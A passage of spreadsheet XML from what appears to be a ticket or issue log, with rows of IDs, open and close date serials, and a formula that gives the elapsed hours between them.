    </row>
    <row r="989" spans="1:8">
      <c r="A989" t="s">
        <v>2901</v>
      </c>
      <c r="B989">
        <v>12546</v>
      </c>
      <c r="C989" t="s">
        <v>2902</v>
      </c>
      <c r="D989" t="s">
        <v>7</v>
      </c>
      <c r="E989" s="1">
        <v>43448.51767361111</v>
      </c>
      <c r="F989" s="1">
        <v>43451.481435185182</v>
      </c>
      <c r="G989" t="s">
        <v>16</v>
      </c>
      <c r="H989" t="str">
        <f>TEXT(F989-E989,"[h]")</f>
        <v>71</v>
      </c>
    </row>
    <row r="990" spans="1:8">
      <c r="A990" t="s">
        <v>2664</v>
      </c>
      <c r="B990">
        <v>12545</v>
      </c>
      <c r="C990" t="s">
        <v>2665</v>
      </c>
      <c r="D990" t="s">
        <v>7</v>
      </c>
      <c r="E990" s="1">
        <v>43448.445324074077</v>
      </c>
      <c r="F990" s="1">
        <v>43475.722453703704</v>
      </c>
      <c r="G990" t="s">
        <v>189</v>
      </c>
      <c r="H990" t="str">
        <f>TEXT(F990-E990,"[h]")</f>
        <v>654</v>
      </c>
    </row>
    <row r="991" spans="1:8">
      <c r="A991" t="s">
        <v>2922</v>
      </c>
      <c r="B991">
        <v>12544</v>
      </c>
      <c r="C991" t="s">
        <v>2923</v>
      </c>
      <c r="D991" t="s">
        <v>7</v>
      </c>
      <c r="E991" s="1">
        <v>43448.319699074076</v>
      </c>
      <c r="F991" s="1">
        <v>43451.058009259257</v>
      </c>
      <c r="G991" t="s">
        <v>16</v>
      </c>
      <c r="H991" t="str">
        <f>TEXT(F991-E991,"[h]")</f>
        <v>65</v>
      </c>
    </row>
    <row r="992" spans="1:8" hidden="1">
      <c r="A992" t="s">
        <v>2961</v>
      </c>
      <c r="B992">
        <v>12543</v>
      </c>
      <c r="C992" t="s">
        <v>2962</v>
      </c>
      <c r="D992" t="s">
        <v>7</v>
      </c>
      <c r="E992" s="1">
        <v>43447.997997685183</v>
      </c>
      <c r="F992" s="1">
        <v>43448.074305555558</v>
      </c>
      <c r="G992" t="s">
        <v>95</v>
      </c>
      <c r="H992" t="str">
        <f>TEXT(F992-E992,"[h]")</f>
        <v>1</v>
      </c>
    </row>
    <row r="993" spans="1:8" hidden="1">
      <c r="A993" t="s">
        <v>2963</v>
      </c>
      <c r="B993">
        <v>12539</v>
      </c>
      <c r="C993" t="s">
        <v>2964</v>
      </c>
      <c r="D993" t="s">
        <v>7</v>
      </c>
      <c r="E993" s="1">
        <v>43447.580057870371</v>
      </c>
      <c r="F993" s="1">
        <v>43447.820185185185</v>
      </c>
      <c r="G993" t="s">
        <v>55</v>
      </c>
      <c r="H993" t="str">
        <f>TEXT(F993-E993,"[h]")</f>
        <v>5</v>
      </c>
    </row>
    <row r="994" spans="1:8" hidden="1">
      <c r="A994" t="s">
        <v>2965</v>
      </c>
      <c r="B994">
        <v>12538</v>
      </c>
      <c r="C994" t="s">
        <v>2966</v>
      </c>
      <c r="D994" t="s">
        <v>7</v>
      </c>
      <c r="E994" s="1">
        <v>43446.9296412037</v>
      </c>
      <c r="F994" s="1">
        <v>43447.026689814818</v>
      </c>
      <c r="G994" t="s">
        <v>95</v>
      </c>
      <c r="H994" t="str">
        <f>TEXT(F994-E994,"[h]")</f>
        <v>2</v>
      </c>
    </row>
    <row r="995" spans="1:8" hidden="1">
      <c r="A995" t="s">
        <v>2967</v>
      </c>
      <c r="B995">
        <v>12537</v>
      </c>
      <c r="C995" t="s">
        <v>2968</v>
      </c>
      <c r="D995" t="s">
        <v>7</v>
      </c>
      <c r="E995" s="1">
        <v>43446.751354166663</v>
      </c>
      <c r="F995" s="1">
        <v>43446.769675925927</v>
      </c>
      <c r="G995" t="s">
        <v>66</v>
      </c>
      <c r="H995" t="str">
        <f>TEXT(F995-E995,"[h]")</f>
        <v>0</v>
      </c>
    </row>
    <row r="996" spans="1:8" hidden="1">
      <c r="A996" t="s">
        <v>2969</v>
      </c>
      <c r="B996">
        <v>12535</v>
      </c>
      <c r="C996" t="s">
        <v>2970</v>
      </c>
      <c r="D996" t="s">
        <v>7</v>
      </c>
      <c r="E996" s="1">
        <v>43446.396886574075</v>
      </c>
      <c r="F996" s="1">
        <v>43449.730497685188</v>
      </c>
      <c r="G996" t="s">
        <v>2971</v>
      </c>
      <c r="H996" t="str">
        <f>TEXT(F996-E996,"[h]")</f>
        <v>80</v>
      </c>
    </row>
    <row r="997" spans="1:8" hidden="1">
      <c r="A997" t="s">
        <v>2972</v>
      </c>
      <c r="B997">
        <v>12534</v>
      </c>
      <c r="C997" t="s">
        <v>2973</v>
      </c>
      <c r="D997" t="s">
        <v>7</v>
      </c>
      <c r="E997" s="1">
        <v>43445.830266203702</v>
      </c>
      <c r="F997" s="1">
        <v>43448.281273148146</v>
      </c>
      <c r="G997" t="s">
        <v>66</v>
      </c>
      <c r="H997" t="str">
        <f>TEXT(F997-E997,"[h]")</f>
        <v>58</v>
      </c>
    </row>
    <row r="998" spans="1:8" hidden="1">
      <c r="A998" t="s">
        <v>2974</v>
      </c>
      <c r="B998">
        <v>12533</v>
      </c>
      <c r="C998" t="s">
        <v>2975</v>
      </c>
      <c r="D998" t="s">
        <v>7</v>
      </c>
      <c r="E998" s="1">
        <v>43445.790208333332</v>
      </c>
      <c r="F998" s="1">
        <v>43446.307372685187</v>
      </c>
      <c r="G998" t="s">
        <v>2054</v>
      </c>
      <c r="H998" t="str">
        <f>TEXT(F998-E998,"[h]")</f>
        <v>12</v>
      </c>
    </row>
    <row r="999" spans="1:8" hidden="1">
      <c r="A999" t="s">
        <v>2976</v>
      </c>
      <c r="B999">
        <v>12532</v>
      </c>
      <c r="C999" t="s">
        <v>2977</v>
      </c>
      <c r="D999" t="s">
        <v>7</v>
      </c>
      <c r="E999" s="1">
        <v>43445.461446759262</v>
      </c>
      <c r="F999" s="1">
        <v>43447.634479166663</v>
      </c>
      <c r="G999" t="s">
        <v>2978</v>
      </c>
      <c r="H999" t="str">
        <f>TEXT(F999-E999,"[h]")</f>
        <v>52</v>
      </c>
    </row>
    <row r="1000" spans="1:8" hidden="1">
      <c r="A1000" t="s">
        <v>2979</v>
      </c>
      <c r="B1000">
        <v>12531</v>
      </c>
      <c r="C1000" t="s">
        <v>2980</v>
      </c>
      <c r="D1000" t="s">
        <v>7</v>
      </c>
      <c r="E1000" s="1">
        <v>43445.186828703707</v>
      </c>
      <c r="F1000" s="1">
        <v>43465.948460648149</v>
      </c>
      <c r="G1000" t="s">
        <v>2981</v>
      </c>
      <c r="H1000" t="str">
        <f>TEXT(F1000-E1000,"[h]")</f>
        <v>498</v>
      </c>
    </row>
    <row r="1001" spans="1:8" hidden="1">
      <c r="A1001" t="s">
        <v>2982</v>
      </c>
      <c r="B1001">
        <v>12529</v>
      </c>
      <c r="C1001" t="s">
        <v>2983</v>
      </c>
      <c r="D1001" t="s">
        <v>7</v>
      </c>
      <c r="E1001" s="1">
        <v>43444.994953703703</v>
      </c>
      <c r="F1001" s="1">
        <v>43447.71366898148</v>
      </c>
      <c r="G1001" t="s">
        <v>2984</v>
      </c>
      <c r="H1001" t="str">
        <f>TEXT(F1001-E1001,"[h]")</f>
        <v>65</v>
      </c>
    </row>
    <row r="1002" spans="1:8">
      <c r="A1002" t="s">
        <v>2941</v>
      </c>
      <c r="B1002">
        <v>12528</v>
      </c>
      <c r="C1002" t="s">
        <v>2942</v>
      </c>
      <c r="D1002" t="s">
        <v>7</v>
      </c>
      <c r="E1002" s="1">
        <v>43444.881469907406</v>
      </c>
      <c r="F1002" s="1">
        <v>43444.922094907408</v>
      </c>
      <c r="G1002" t="s">
        <v>16</v>
      </c>
      <c r="H1002" t="str">
        <f>TEXT(F1002-E1002,"[h]")</f>
        <v>0</v>
      </c>
    </row>
    <row r="1003" spans="1:8">
      <c r="A1003" t="s">
        <v>2985</v>
      </c>
      <c r="B1003">
        <v>12527</v>
      </c>
      <c r="C1003" t="s">
        <v>2986</v>
      </c>
      <c r="D1003" t="s">
        <v>7</v>
      </c>
      <c r="E1003" s="1">
        <v>43444.68409722222</v>
      </c>
      <c r="F1003" s="1">
        <v>43444.901875000003</v>
      </c>
      <c r="G1003" t="s">
        <v>1709</v>
      </c>
      <c r="H1003" t="str">
        <f>TEXT(F1003-E1003,"[h]")</f>
        <v>5</v>
      </c>
    </row>
    <row r="1004" spans="1:8">
      <c r="A1004" t="s">
        <v>2935</v>
      </c>
      <c r="B1004">
        <v>12526</v>
      </c>
      <c r="C1004" t="s">
        <v>2936</v>
      </c>
      <c r="D1004" t="s">
        <v>7</v>
      </c>
      <c r="E1004" s="1">
        <v>43444.354872685188</v>
      </c>
      <c r="F1004" s="1">
        <v>43447.703483796293</v>
      </c>
      <c r="G1004" t="s">
        <v>2937</v>
      </c>
      <c r="H1004" t="str">
        <f>TEXT(F1004-E1004,"[h]")</f>
        <v>80</v>
      </c>
    </row>
    <row r="1005" spans="1:8">
      <c r="A1005" t="s">
        <v>2987</v>
      </c>
      <c r="B1005">
        <v>12524</v>
      </c>
      <c r="C1005" t="s">
        <v>2988</v>
      </c>
      <c r="D1005" t="s">
        <v>7</v>
      </c>
      <c r="E1005" s="1">
        <v>43444.236712962964</v>
      </c>
      <c r="F1005" s="1">
        <v>43448.25677083333</v>
      </c>
      <c r="G1005" t="s">
        <v>129</v>
      </c>
      <c r="H1005" t="str">
        <f>TEXT(F1005-E1005,"[h]")</f>
        <v>96</v>
      </c>
    </row>
    <row r="1006" spans="1:8" hidden="1">
      <c r="A1006" t="s">
        <v>2989</v>
      </c>
      <c r="B1006">
        <v>12523</v>
      </c>
      <c r="C1006" t="s">
        <v>2990</v>
      </c>
      <c r="D1006" t="s">
        <v>7</v>
      </c>
      <c r="E1006" s="1">
        <v>43444.102627314816</v>
      </c>
      <c r="F1006" s="1">
        <v>43530.871215277781</v>
      </c>
      <c r="G1006" t="s">
        <v>2991</v>
      </c>
      <c r="H1006" t="str">
        <f>TEXT(F1006-E1006,"[h]")</f>
        <v>2082</v>
      </c>
    </row>
    <row r="1007" spans="1:8">
      <c r="A1007" t="s">
        <v>2930</v>
      </c>
      <c r="B1007">
        <v>12522</v>
      </c>
      <c r="C1007" t="s">
        <v>2931</v>
      </c>
      <c r="D1007" t="s">
        <v>7</v>
      </c>
      <c r="E1007" s="1">
        <v>43443.988298611112</v>
      </c>
      <c r="F1007" s="1">
        <v>43444.764606481483</v>
      </c>
      <c r="G1007" t="s">
        <v>2264</v>
      </c>
      <c r="H1007" t="str">
        <f>TEXT(F1007-E1007,"[h]")</f>
        <v>18</v>
      </c>
    </row>
    <row r="1008" spans="1:8">
      <c r="A1008" t="s">
        <v>2992</v>
      </c>
      <c r="B1008">
        <v>12520</v>
      </c>
      <c r="C1008" t="s">
        <v>2993</v>
      </c>
      <c r="D1008" t="s">
        <v>7</v>
      </c>
      <c r="E1008" s="1">
        <v>43443.908506944441</v>
      </c>
      <c r="F1008" s="1">
        <v>43447.837858796294</v>
      </c>
      <c r="G1008" t="s">
        <v>2994</v>
      </c>
      <c r="H1008" t="str">
        <f>TEXT(F1008-E1008,"[h]")</f>
        <v>94</v>
      </c>
    </row>
    <row r="1009" spans="1:8" hidden="1">
      <c r="A1009" t="s">
        <v>2995</v>
      </c>
      <c r="B1009">
        <v>12519</v>
      </c>
      <c r="C1009" t="s">
        <v>2996</v>
      </c>
      <c r="D1009" t="s">
        <v>7</v>
      </c>
      <c r="E1009" s="1">
        <v>43443.415578703702</v>
      </c>
      <c r="F1009" s="1">
        <v>43600.758553240739</v>
      </c>
      <c r="G1009" t="s">
        <v>2997</v>
      </c>
      <c r="H1009" t="str">
        <f>TEXT(F1009-E1009,"[h]")</f>
        <v>3776</v>
      </c>
    </row>
    <row r="1010" spans="1:8" hidden="1">
      <c r="A1010" t="s">
        <v>2998</v>
      </c>
      <c r="B1010">
        <v>12512</v>
      </c>
      <c r="C1010" t="s">
        <v>2999</v>
      </c>
      <c r="D1010" t="s">
        <v>7</v>
      </c>
      <c r="E1010" s="1">
        <v>43442.856412037036</v>
      </c>
      <c r="F1010" s="1">
        <v>43442.909942129627</v>
      </c>
      <c r="G1010" t="s">
        <v>174</v>
      </c>
      <c r="H1010" t="str">
        <f>TEXT(F1010-E1010,"[h]")</f>
        <v>1</v>
      </c>
    </row>
    <row r="1011" spans="1:8">
      <c r="A1011" t="s">
        <v>3000</v>
      </c>
      <c r="B1011">
        <v>12511</v>
      </c>
      <c r="C1011" t="s">
        <v>3001</v>
      </c>
      <c r="D1011" t="s">
        <v>7</v>
      </c>
      <c r="E1011" s="1">
        <v>43442.850486111114</v>
      </c>
      <c r="F1011" s="1">
        <v>43444.986238425925</v>
      </c>
      <c r="G1011" t="s">
        <v>16</v>
      </c>
      <c r="H1011" t="str">
        <f>TEXT(F1011-E1011,"[h]")</f>
        <v>51</v>
      </c>
    </row>
    <row r="1012" spans="1:8" hidden="1">
      <c r="A1012" t="s">
        <v>2945</v>
      </c>
      <c r="B1012">
        <v>12508</v>
      </c>
      <c r="C1012" t="s">
        <v>2946</v>
      </c>
      <c r="D1012" t="s">
        <v>7</v>
      </c>
      <c r="E1012" s="1">
        <v>43442.192164351851</v>
      </c>
      <c r="F1012" s="1">
        <v>43442.231064814812</v>
      </c>
      <c r="G1012" t="s">
        <v>445</v>
      </c>
      <c r="H1012" t="str">
        <f>TEXT(F1012-E1012,"[h]")</f>
        <v>0</v>
      </c>
    </row>
    <row r="1013" spans="1:8">
      <c r="A1013" t="s">
        <v>3002</v>
      </c>
      <c r="B1013">
        <v>12507</v>
      </c>
      <c r="C1013" t="s">
        <v>3003</v>
      </c>
      <c r="D1013" t="s">
        <v>7</v>
      </c>
      <c r="E1013" s="1">
        <v>43442.094733796293</v>
      </c>
      <c r="F1013" s="1">
        <v>43450.673333333332</v>
      </c>
      <c r="G1013" t="s">
        <v>25</v>
      </c>
      <c r="H1013" t="str">
        <f>TEXT(F1013-E1013,"[h]")</f>
        <v>205</v>
      </c>
    </row>
    <row r="1014" spans="1:8" hidden="1">
      <c r="A1014" t="s">
        <v>3004</v>
      </c>
      <c r="B1014">
        <v>12506</v>
      </c>
      <c r="C1014" t="s">
        <v>3005</v>
      </c>
      <c r="D1014" t="s">
        <v>7</v>
      </c>
      <c r="E1014" s="1">
        <v>43441.972858796296</v>
      </c>
      <c r="F1014" s="1">
        <v>43442.822465277779</v>
      </c>
      <c r="G1014" t="s">
        <v>3006</v>
      </c>
      <c r="H1014" t="str">
        <f>TEXT(F1014-E1014,"[h]")</f>
        <v>20</v>
      </c>
    </row>
    <row r="1015" spans="1:8" hidden="1">
      <c r="A1015" t="s">
        <v>3007</v>
      </c>
      <c r="B1015">
        <v>12504</v>
      </c>
      <c r="C1015" t="s">
        <v>3008</v>
      </c>
      <c r="D1015" t="s">
        <v>7</v>
      </c>
      <c r="E1015" s="1">
        <v>43441.869432870371</v>
      </c>
      <c r="F1015" s="1">
        <v>43442.164907407408</v>
      </c>
      <c r="G1015" t="s">
        <v>109</v>
      </c>
      <c r="H1015" t="str">
        <f>TEXT(F1015-E1015,"[h]")</f>
        <v>7</v>
      </c>
    </row>
    <row r="1016" spans="1:8" hidden="1">
      <c r="A1016" t="s">
        <v>3009</v>
      </c>
      <c r="B1016">
        <v>12502</v>
      </c>
      <c r="C1016" t="s">
        <v>3010</v>
      </c>
      <c r="D1016" t="s">
        <v>7</v>
      </c>
      <c r="E1016" s="1">
        <v>43441.806631944448</v>
      </c>
      <c r="F1016" s="1">
        <v>43443.694166666668</v>
      </c>
      <c r="G1016" t="s">
        <v>55</v>
      </c>
      <c r="H1016" t="str">
        <f>TEXT(F1016-E1016,"[h]")</f>
        <v>45</v>
      </c>
    </row>
    <row r="1017" spans="1:8" hidden="1">
      <c r="A1017" t="s">
        <v>3011</v>
      </c>
      <c r="B1017">
        <v>12501</v>
      </c>
      <c r="C1017" t="s">
        <v>3012</v>
      </c>
      <c r="D1017" t="s">
        <v>7</v>
      </c>
      <c r="E1017" s="1">
        <v>43441.801388888889</v>
      </c>
      <c r="F1017" s="1">
        <v>43441.845277777778</v>
      </c>
      <c r="G1017" t="s">
        <v>174</v>
      </c>
      <c r="H1017" t="str">
        <f>TEXT(F1017-E1017,"[h]")</f>
        <v>1</v>
      </c>
    </row>
    <row r="1018" spans="1:8" hidden="1">
      <c r="A1018" t="s">
        <v>3013</v>
      </c>
      <c r="B1018">
        <v>12498</v>
      </c>
      <c r="C1018" t="s">
        <v>3014</v>
      </c>
      <c r="D1018" t="s">
        <v>7</v>
      </c>
      <c r="E1018" s="1">
        <v>43440.940416666665</v>
      </c>
      <c r="F1018" s="1">
        <v>43440.964039351849</v>
      </c>
      <c r="G1018" t="s">
        <v>95</v>
      </c>
      <c r="H1018" t="str">
        <f>TEXT(F1018-E1018,"[h]")</f>
        <v>0</v>
      </c>
    </row>
    <row r="1019" spans="1:8">
      <c r="A1019" t="s">
        <v>3015</v>
      </c>
      <c r="B1019">
        <v>12494</v>
      </c>
      <c r="C1019" t="s">
        <v>3016</v>
      </c>
      <c r="D1019" t="s">
        <v>7</v>
      </c>
      <c r="E1019" s="1">
        <v>43440.036238425928</v>
      </c>
      <c r="F1019" s="1">
        <v>43441.82712962963</v>
      </c>
      <c r="G1019" t="s">
        <v>16</v>
      </c>
      <c r="H1019" t="str">
        <f>TEXT(F1019-E1019,"[h]")</f>
        <v>42</v>
      </c>
    </row>
    <row r="1020" spans="1:8" hidden="1">
      <c r="A1020" t="s">
        <v>3017</v>
      </c>
      <c r="B1020">
        <v>12492</v>
      </c>
      <c r="C1020" t="s">
        <v>3018</v>
      </c>
      <c r="D1020" t="s">
        <v>7</v>
      </c>
      <c r="E1020" s="1">
        <v>43439.969398148147</v>
      </c>
      <c r="F1020" s="1">
        <v>43467.914814814816</v>
      </c>
      <c r="G1020" t="s">
        <v>852</v>
      </c>
      <c r="H1020" t="str">
        <f>TEXT(F1020-E1020,"[h]")</f>
        <v>670</v>
      </c>
    </row>
    <row r="1021" spans="1:8" hidden="1">
      <c r="A1021" t="s">
        <v>3019</v>
      </c>
      <c r="B1021">
        <v>12489</v>
      </c>
      <c r="C1021" t="s">
        <v>3020</v>
      </c>
      <c r="D1021" t="s">
        <v>7</v>
      </c>
      <c r="E1021" s="1">
        <v>43439.49962962963</v>
      </c>
      <c r="F1021" s="1">
        <v>43452.452962962961</v>
      </c>
      <c r="G1021" t="s">
        <v>66</v>
      </c>
      <c r="H1021" t="str">
        <f>TEXT(F1021-E1021,"[h]")</f>
        <v>310</v>
      </c>
    </row>
    <row r="1022" spans="1:8" hidden="1">
      <c r="A1022" t="s">
        <v>3021</v>
      </c>
      <c r="B1022">
        <v>12488</v>
      </c>
      <c r="C1022" t="s">
        <v>3022</v>
      </c>
      <c r="D1022" t="s">
        <v>7</v>
      </c>
      <c r="E1022" s="1">
        <v>43439.31322916667</v>
      </c>
      <c r="F1022" s="1">
        <v>43439.751250000001</v>
      </c>
      <c r="G1022" t="s">
        <v>258</v>
      </c>
      <c r="H1022" t="str">
        <f>TEXT(F1022-E1022,"[h]")</f>
        <v>10</v>
      </c>
    </row>
    <row r="1023" spans="1:8" hidden="1">
      <c r="A1023" t="s">
        <v>1772</v>
      </c>
      <c r="B1023">
        <v>12486</v>
      </c>
      <c r="C1023" t="s">
        <v>3023</v>
      </c>
      <c r="D1023" t="s">
        <v>7</v>
      </c>
      <c r="E1023" s="1">
        <v>43439.294641203705</v>
      </c>
      <c r="F1023" s="1">
        <v>43439.681006944447</v>
      </c>
      <c r="G1023" t="s">
        <v>66</v>
      </c>
      <c r="H1023" t="str">
        <f>TEXT(F1023-E1023,"[h]")</f>
        <v>9</v>
      </c>
    </row>
    <row r="1024" spans="1:8" hidden="1">
      <c r="A1024" t="s">
        <v>3024</v>
      </c>
      <c r="B1024">
        <v>12483</v>
      </c>
      <c r="C1024" t="s">
        <v>3025</v>
      </c>
      <c r="D1024" t="s">
        <v>7</v>
      </c>
      <c r="E1024" s="1">
        <v>43438.907638888886</v>
      </c>
      <c r="F1024" s="1">
        <v>43451.805659722224</v>
      </c>
      <c r="G1024" t="s">
        <v>852</v>
      </c>
      <c r="H1024" t="str">
        <f>TEXT(F1024-E1024,"[h]")</f>
        <v>309</v>
      </c>
    </row>
    <row r="1025" spans="1:8" hidden="1">
      <c r="A1025" t="s">
        <v>3026</v>
      </c>
      <c r="B1025">
        <v>12482</v>
      </c>
      <c r="C1025" t="s">
        <v>3027</v>
      </c>
      <c r="D1025" t="s">
        <v>7</v>
      </c>
      <c r="E1025" s="1">
        <v>43438.848530092589</v>
      </c>
      <c r="F1025" s="1">
        <v>43439.751250000001</v>
      </c>
      <c r="G1025" t="s">
        <v>3028</v>
      </c>
      <c r="H1025" t="str">
        <f>TEXT(F1025-E1025,"[h]")</f>
        <v>21</v>
      </c>
    </row>
    <row r="1026" spans="1:8" hidden="1">
      <c r="A1026" t="s">
        <v>3029</v>
      </c>
      <c r="B1026">
        <v>12480</v>
      </c>
      <c r="C1026" t="s">
        <v>3030</v>
      </c>
      <c r="D1026" t="s">
        <v>7</v>
      </c>
      <c r="E1026" s="1">
        <v>43438.061909722222</v>
      </c>
      <c r="F1026" s="1">
        <v>43448.719826388886</v>
      </c>
      <c r="G1026" t="s">
        <v>278</v>
      </c>
      <c r="H1026" t="str">
        <f>TEXT(F1026-E1026,"[h]")</f>
        <v>255</v>
      </c>
    </row>
    <row r="1027" spans="1:8" hidden="1">
      <c r="A1027" t="s">
        <v>3031</v>
      </c>
      <c r="B1027">
        <v>12478</v>
      </c>
      <c r="C1027" t="s">
        <v>3032</v>
      </c>
      <c r="D1027" t="s">
        <v>7</v>
      </c>
      <c r="E1027" s="1">
        <v>43437.201261574075</v>
      </c>
      <c r="F1027" s="1">
        <v>43438.707384259258</v>
      </c>
      <c r="G1027" t="s">
        <v>278</v>
      </c>
      <c r="H1027" t="str">
        <f>TEXT(F1027-E1027,"[h]")</f>
        <v>36</v>
      </c>
    </row>
    <row r="1028" spans="1:8" hidden="1">
      <c r="A1028" t="s">
        <v>3033</v>
      </c>
      <c r="B1028">
        <v>12475</v>
      </c>
      <c r="C1028" t="s">
        <v>3034</v>
      </c>
      <c r="D1028" t="s">
        <v>7</v>
      </c>
      <c r="E1028" s="1">
        <v>43436.012488425928</v>
      </c>
      <c r="F1028" s="1">
        <v>43445.421550925923</v>
      </c>
      <c r="G1028" t="s">
        <v>3035</v>
      </c>
      <c r="H1028" t="str">
        <f>TEXT(F1028-E1028,"[h]")</f>
        <v>225</v>
      </c>
    </row>
    <row r="1029" spans="1:8" hidden="1">
      <c r="A1029" t="s">
        <v>3036</v>
      </c>
      <c r="B1029">
        <v>12474</v>
      </c>
      <c r="C1029" t="s">
        <v>3037</v>
      </c>
      <c r="D1029" t="s">
        <v>7</v>
      </c>
      <c r="E1029" s="1">
        <v>43436.008761574078</v>
      </c>
      <c r="F1029" s="1">
        <v>43438.622060185182</v>
      </c>
      <c r="G1029" t="s">
        <v>55</v>
      </c>
      <c r="H1029" t="str">
        <f>TEXT(F1029-E1029,"[h]")</f>
        <v>62</v>
      </c>
    </row>
    <row r="1030" spans="1:8" hidden="1">
      <c r="A1030" t="s">
        <v>3038</v>
      </c>
      <c r="B1030">
        <v>12471</v>
      </c>
      <c r="C1030" t="s">
        <v>3039</v>
      </c>
      <c r="D1030" t="s">
        <v>7</v>
      </c>
      <c r="E1030" s="1">
        <v>43435.831261574072</v>
      </c>
      <c r="F1030" s="1">
        <v>43435.971250000002</v>
      </c>
      <c r="G1030" t="s">
        <v>3040</v>
      </c>
      <c r="H1030" t="str">
        <f>TEXT(F1030-E1030,"[h]")</f>
        <v>3</v>
      </c>
    </row>
    <row r="1031" spans="1:8" hidden="1">
      <c r="A1031" t="s">
        <v>3041</v>
      </c>
      <c r="B1031">
        <v>12470</v>
      </c>
      <c r="C1031" t="s">
        <v>3042</v>
      </c>
      <c r="D1031" t="s">
        <v>7</v>
      </c>
      <c r="E1031" s="1">
        <v>43435.827175925922</v>
      </c>
      <c r="F1031" s="1">
        <v>43436.008171296293</v>
      </c>
      <c r="G1031" t="s">
        <v>1969</v>
      </c>
      <c r="H1031" t="str">
        <f>TEXT(F1031-E1031,"[h]")</f>
        <v>4</v>
      </c>
    </row>
    <row r="1032" spans="1:8" hidden="1">
      <c r="A1032" t="s">
        <v>3043</v>
      </c>
      <c r="B1032">
        <v>12466</v>
      </c>
      <c r="C1032" t="s">
        <v>3044</v>
      </c>
      <c r="D1032" t="s">
        <v>7</v>
      </c>
      <c r="E1032" s="1">
        <v>43434.839525462965</v>
      </c>
      <c r="F1032" s="1">
        <v>43435.739618055559</v>
      </c>
      <c r="G1032" t="s">
        <v>55</v>
      </c>
      <c r="H1032" t="str">
        <f>TEXT(F1032-E1032,"[h]")</f>
        <v>21</v>
      </c>
    </row>
    <row r="1033" spans="1:8">
      <c r="A1033" t="s">
        <v>3045</v>
      </c>
      <c r="B1033">
        <v>12464</v>
      </c>
      <c r="C1033" t="s">
        <v>3046</v>
      </c>
      <c r="D1033" t="s">
        <v>7</v>
      </c>
      <c r="E1033" s="1">
        <v>43434.692488425928</v>
      </c>
      <c r="F1033" s="1">
        <v>43435.721041666664</v>
      </c>
      <c r="G1033" t="s">
        <v>610</v>
      </c>
      <c r="H1033" t="str">
        <f>TEXT(F1033-E1033,"[h]")</f>
        <v>24</v>
      </c>
    </row>
    <row r="1034" spans="1:8" hidden="1">
      <c r="A1034" t="s">
        <v>3047</v>
      </c>
      <c r="B1034">
        <v>12463</v>
      </c>
      <c r="C1034" t="s">
        <v>3048</v>
      </c>
      <c r="D1034" t="s">
        <v>7</v>
      </c>
      <c r="E1034" s="1">
        <v>43433.001377314817</v>
      </c>
      <c r="F1034" s="1">
        <v>43480.234166666669</v>
      </c>
      <c r="G1034" t="s">
        <v>2948</v>
      </c>
      <c r="H1034" t="str">
        <f>TEXT(F1034-E1034,"[h]")</f>
        <v>1133</v>
      </c>
    </row>
    <row r="1035" spans="1:8" hidden="1">
      <c r="A1035" t="s">
        <v>3049</v>
      </c>
      <c r="B1035">
        <v>12462</v>
      </c>
      <c r="C1035" t="s">
        <v>3050</v>
      </c>
      <c r="D1035" t="s">
        <v>7</v>
      </c>
      <c r="E1035" s="1">
        <v>43432.800868055558</v>
      </c>
      <c r="F1035" s="1">
        <v>43457.38989583333</v>
      </c>
      <c r="G1035" t="s">
        <v>37</v>
      </c>
      <c r="H1035" t="str">
        <f>TEXT(F1035-E1035,"[h]")</f>
        <v>590</v>
      </c>
    </row>
    <row r="1036" spans="1:8" hidden="1">
      <c r="A1036" t="s">
        <v>3051</v>
      </c>
      <c r="B1036">
        <v>12460</v>
      </c>
      <c r="C1036" t="s">
        <v>3052</v>
      </c>
      <c r="D1036" t="s">
        <v>7</v>
      </c>
      <c r="E1036" s="1">
        <v>43432.543344907404</v>
      </c>
      <c r="F1036" s="1">
        <v>43475.709097222221</v>
      </c>
      <c r="G1036" t="s">
        <v>886</v>
      </c>
      <c r="H1036" t="str">
        <f>TEXT(F1036-E1036,"[h]")</f>
        <v>1035</v>
      </c>
    </row>
    <row r="1037" spans="1:8" hidden="1">
      <c r="A1037" t="s">
        <v>3053</v>
      </c>
      <c r="B1037">
        <v>12459</v>
      </c>
      <c r="C1037" t="s">
        <v>3054</v>
      </c>
      <c r="D1037" t="s">
        <v>7</v>
      </c>
      <c r="E1037" s="1">
        <v>43432.178437499999</v>
      </c>
      <c r="F1037" s="1">
        <v>43441.563692129632</v>
      </c>
      <c r="G1037" t="s">
        <v>37</v>
      </c>
      <c r="H1037" t="str">
        <f>TEXT(F1037-E1037,"[h]")</f>
        <v>225</v>
      </c>
    </row>
    <row r="1038" spans="1:8" hidden="1">
      <c r="A1038" t="s">
        <v>3055</v>
      </c>
      <c r="B1038">
        <v>12458</v>
      </c>
      <c r="C1038" t="s">
        <v>3056</v>
      </c>
      <c r="D1038" t="s">
        <v>7</v>
      </c>
      <c r="E1038" s="1">
        <v>43432.023136574076</v>
      </c>
      <c r="F1038" s="1">
        <v>43432.037256944444</v>
      </c>
      <c r="G1038" t="s">
        <v>90</v>
      </c>
      <c r="H1038" t="str">
        <f>TEXT(F1038-E1038,"[h]")</f>
        <v>0</v>
      </c>
    </row>
    <row r="1039" spans="1:8" hidden="1">
      <c r="A1039" t="s">
        <v>3057</v>
      </c>
      <c r="B1039">
        <v>12457</v>
      </c>
      <c r="C1039" t="s">
        <v>3058</v>
      </c>
      <c r="D1039" t="s">
        <v>7</v>
      </c>
      <c r="E1039" s="1">
        <v>43432.005219907405</v>
      </c>
      <c r="F1039" s="1">
        <v>43538.768159722225</v>
      </c>
      <c r="G1039" t="s">
        <v>55</v>
      </c>
      <c r="H1039" t="str">
        <f>TEXT(F1039-E1039,"[h]")</f>
        <v>2562</v>
      </c>
    </row>
    <row r="1040" spans="1:8" hidden="1">
      <c r="A1040" t="s">
        <v>3059</v>
      </c>
      <c r="B1040">
        <v>12456</v>
      </c>
      <c r="C1040" t="s">
        <v>2669</v>
      </c>
      <c r="D1040" t="s">
        <v>7</v>
      </c>
      <c r="E1040" s="1">
        <v>43431.968148148146</v>
      </c>
      <c r="F1040" s="1">
        <v>43480.2190162037</v>
      </c>
      <c r="G1040" t="s">
        <v>2821</v>
      </c>
      <c r="H1040" t="str">
        <f>TEXT(F1040-E1040,"[h]")</f>
        <v>1158</v>
      </c>
    </row>
    <row r="1041" spans="1:8" hidden="1">
      <c r="A1041" t="s">
        <v>3060</v>
      </c>
      <c r="B1041">
        <v>12455</v>
      </c>
      <c r="C1041" t="s">
        <v>3061</v>
      </c>
      <c r="D1041" t="s">
        <v>7</v>
      </c>
      <c r="E1041" s="1">
        <v>43431.751296296294</v>
      </c>
      <c r="F1041" s="1">
